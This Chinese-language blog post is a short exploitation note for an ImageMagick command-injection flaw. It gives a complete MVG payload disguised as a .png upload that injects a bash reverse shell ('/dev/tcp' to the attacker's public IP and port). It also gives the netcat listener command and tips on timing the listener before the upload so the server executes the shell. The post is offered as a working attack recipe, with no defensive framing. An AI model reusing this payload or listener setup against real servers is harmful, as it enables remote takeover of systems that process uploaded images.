imagemagick 漏洞的利用说明

最近imagemagick 曝光率那么高,但群里问怎么利用的却很多。

这里自己做一个利用笔记,以及容易出现的错误。

对于网络上传播的利用说明,那个方式并没什么问题,但是太绕了。

说个简单的。下列脚本放入 后缀名png即可。(说明:该脚本是通过 bash命令把端口反弹出去,类似win肉鸡上执行了 nc -t -e cmd.exe 你的公网IP 反弹端口)


 

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://example.com/image.jpg”|/bin/bash -i >& /dev/tcp/你的公网IP/反弹端口  0>&1″)’
pop graphic-context


 

重点是如何利用,这里需要个nc,(百度:netcat)

然后在你的公网ip上,既,脚本中填写的那个ip机器上,执行 nc -l -p 脚本中填写的端口 -vv

需要注意的是,一定要先开启监听,再上传。因为图片中脚本在上传过程中,就会被imagemagic执行,

所以等你上传后再监听,不会成功。

当然反弹姿势很多。可百度 linux shell反弹。自行补脑。

至于三个白冒的环境需要python反弹即可。

发表回复